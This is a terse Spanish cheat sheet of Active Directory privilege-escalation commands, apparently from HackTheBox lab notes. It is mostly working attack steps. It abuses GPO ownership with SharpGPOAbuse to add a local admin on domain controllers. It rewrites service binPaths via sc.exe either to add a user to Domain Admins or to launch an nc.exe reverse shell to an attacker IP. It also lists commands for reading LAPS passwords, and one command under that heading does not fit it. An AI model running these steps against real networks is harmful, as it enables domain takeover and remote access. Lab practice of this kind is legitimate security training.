Grupos para escalar en AD
CREAR GPOs PARA ESCALAR (por ejemplo si somos miembros de GPO owners)
New-GPO -Name "hacker"
New-GPLink -Name "hacker" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount USER --GPOName hacker
gpupdate /force
Service Operators
Listamos los servicios con:
services
sc config servicePATH binPath="cmd.exe /c net group 'Domain Admins' usuarioPwned /add /domain"
||
sc.exe config servicePATH binPath="C:\Users\svc-printer\AppData\Local\Temp\nc.exe -e cmd.exe IP PUERTO"
sc.exe stop serviceName
sc.exe start serviceName
LAPS readers
Pueden leer todas las contraseñas
Get-ADComputer -Filter ‘ObjectClass -eq “computer”’ -Property *
netstat -ano | FindStr /I "Pwd"
Protected Users/Objects
Obliga al usuario a usar solo los métodos más seguros (Kerberos AES) y bloquea los débiles (NTLM, RC4).